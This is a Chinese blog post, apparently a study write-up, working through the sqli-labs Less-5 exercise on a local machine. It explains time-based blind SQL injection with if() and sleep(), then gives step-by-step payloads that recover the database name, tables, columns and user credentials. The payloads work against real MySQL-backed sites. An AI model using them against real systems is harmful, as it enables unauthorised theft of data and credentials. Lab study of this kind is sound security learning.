<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.11.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="（1）时间延迟型手工注入：这种注入特点为：不管SQL语句是否正确，不会返回任何信息，只能通过页面缓冲的时间来判断官方理解：利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用，通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回exp">
<meta property="og:type" content="article">
<meta property="og:title" content="sql5-8">
<meta property="og:url" content="http://example.com/2023/03/15/sql5-8/index.html">
<meta property="og:site_name" content="归根">
<meta property="og:description" content="（1）时间延迟型手工注入：这种注入特点为：不管SQL语句是否正确，不会返回任何信息，只能通过页面缓冲的时间来判断官方理解：利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用，通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回exp">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-03-15T00:32:51.000Z">
<meta property="article:modified_time" content="2023-03-20T08:45:45.222Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2023/03/15/sql5-8/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/03/15/sql5-8/","path":"2023/03/15/sql5-8/","title":"sql5-8"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sql5-8 | 归根</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">归根</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description">浮生若梦</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/03/15/sql5-8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="归根">
      <meta itemprop="description" content="浮生若梦">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="sql5-8 | 归根">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql5-8
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-03-15 08:32:51" itemprop="dateCreated datePublished" datetime="2023-03-15T08:32:51+08:00">2023-03-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-03-20 16:45:45" itemprop="dateModified" datetime="2023-03-20T16:45:45+08:00">2023-03-20</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>（1）时间延迟型手工注入：<br>这种注入特点为：不管SQL语句是否正确，不会返回任何信息，只能通过页面缓冲的时间来判断<br>官方理解：利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用，通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。</p>
<p>substr()函数：<br>substr(string, start, length)<br>从string的第start位的length长度</p>
<p>由于页面无法返回正确或错误的值，所以只能通过if加sleep函数解决问题</p>
<p>if（判断语句，x，y）如果判断语句正确则输出X，否则输出Y<br>sleep(X)函数，延迟X秒后回显<br>if(1&#x3D;1,1,sleep(1))即输出一<br>if(1&#x3D;2,1,sleep(1))即延迟一秒后回显<br>1、验证为验证时间延迟型的盲注：<br><a target="_blank" rel="noopener" href="http://127.0.0.1/sqli-labs-master/Less-5/?id=1&#39;">http://127.0.0.1/sqli-labs-master/Less-5/?id=1&#39;</a> and sleep(2)–+<br>ps:sleep(arg1)<br>功能：arg1为中断的时间，单位为秒；<br>eg：if(payload,sleep(5),1);如果测试语句正确，暂停5秒</p>
<p>发现明显延迟，说明猜测正确。接下来的思路是通过延迟，依次爆破数据库长度，数据库名，表名，列名，以及字段。</p>
<p>2、爆数据库名字长度：<br>?id&#x3D;1’ and if(length(database())&gt;猜测的长度,sleep(2),0) –+<br>此处length(database())&gt;猜测的长度的&gt;可以改成&lt;或&#x3D;.</p>
<p>3、爆数据库名<br>这里爆数据库名，和前面不太一样，这里要一个字母一个字母爆。<br>这里以第一个字母为例。</p>
<p>?id&#x3D;1’ and if(ascii(substr(database(),第几位,从第几位开始几位))&#x3D;ascii码,sleep(2),0) –+<br>这段话的意思为：判断第一个字母的ascii码是否为某某<br>类似的此处&#x3D;可以为&gt;或&lt;</p>
<p>eg:?id&#x3D;1’ and if(ascii(substr(database(),1,1))&#x3D;115,sleep(2),0) –+的意思此为判断第一个字母的ascii码是否为115<br>结果若出现2秒延迟则正确。</p>
<p>若要求第二位，则应该用?id&#x3D;1’ and if(ascii(substr(database(),2,1))&#x3D;101,sleep(2),0) –+</p>
<p>4、爆表名<br>**?id&#x3D;1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;‘数据库名’ limit x,y),z,d))&#x3D;猜测字母的ASCII对应的数,sleep(1),0)–-+<br>其中x代表第x+1个表，y表示第x+1往后y个单位的表，z表示第几个字母，d表示z往后d个单位的字母</p>
<p>我们先从第一个表第一个字母开始查寻：</p>
<p>?id&#x3D;1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 0,1),2,1))&#x3D;109,sleep(3),0)–+<br>得到延时回显,我们可知第一表第一个字母为e，不是我们想要的users。<br>我们依次查询，最终在第四个表名得一个字母为我们所寻找的user中的u</p>
<p>?id&#x3D;1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 3,1),1,1))&#x3D;117,sleep(3),0)–+<br>同理，判断第二位为s</p>
<p>?id&#x3D;1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 3,1),2,1))&#x3D;115,sleep(3),0)–+<br>5、爆列名<br>?id&#x3D;1’ and If(ascii(substr((select column_name from information_schema.columns where table_name&#x3D;‘表名’ and table_schema&#x3D;database() limit x,y),z,d))&#x3D;猜测字母的ASCII对应的数,sleep(2),1)–-+<br>x：第x+1个列，y：x+1个列往后y个单位，z：x+1列的第一个字母，d：第一个字母往后的第z个单位</p>
<p>我们先从第一列第一个字母开始查询：</p>
<p>?id&#x3D;1’ and If(ascii(substr((select column_name from information_schema.columns where table_name&#x3D;’users’ and table_schema&#x3D;database() limit 0,1),1,1))&#x3D;105,sleep(2),1)–+<br>得到第一列第一个字母为i</p>
<p>接着查询第一列第二个字母：</p>
<p>?id&#x3D;1’ and If(ascii(substr((select column_name from information_schema.columns where table_name&#x3D;’users’ and table_schema&#x3D;database() limit 0,1),2,1))&#x3D;100,sleep(2),1)–+<br>得到第一列第二个字母为d</p>
<p>接着查询第二列第一个字母：</p>
<p>?id&#x3D;1’ and If(ascii(substr((select column_name from information_schema.columns where table_name&#x3D;’users’ and table_schema&#x3D;database() limit 1,1),1,1))&#x3D;117,sleep(2),1)–+<br>得到第二列第一个字母为u</p>
<p>以此类推得到：<br>第一列：id<br>第二列：username<br>第三列：password</p>
<p>6、爆数据<br><strong>?id&#x3D;1’ and If(ascii(substr((select 列名 from 表名 limit x,y),z,d))&#x3D;猜测字母的ASCII对应的数,sleep(2),1)–+</strong><br>x：第x+1个行，y：x+1个行往后y个单位，z：x+1行的第一个字母，d：第一个字母往后的第z个单位</p>
<p>查询users表username列第一行第一个字母：</p>
<p>?id&#x3D;1’ and If(ascii(substr((select username from users limit 0,1),1,1))&#x3D;68,sleep(2),1)–+<br>得到第一个字母为D</p>
<p>以此类推得到：<br>username:Dumb<br>password:Dumb</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/03/13/1-4/" rel="prev" title="sql 1-4">
                  <i class="fa fa-chevron-left"></i> sql 1-4
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/03/21/sql9-10/" rel="next" title="sql9-10">
                  sql9-10 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
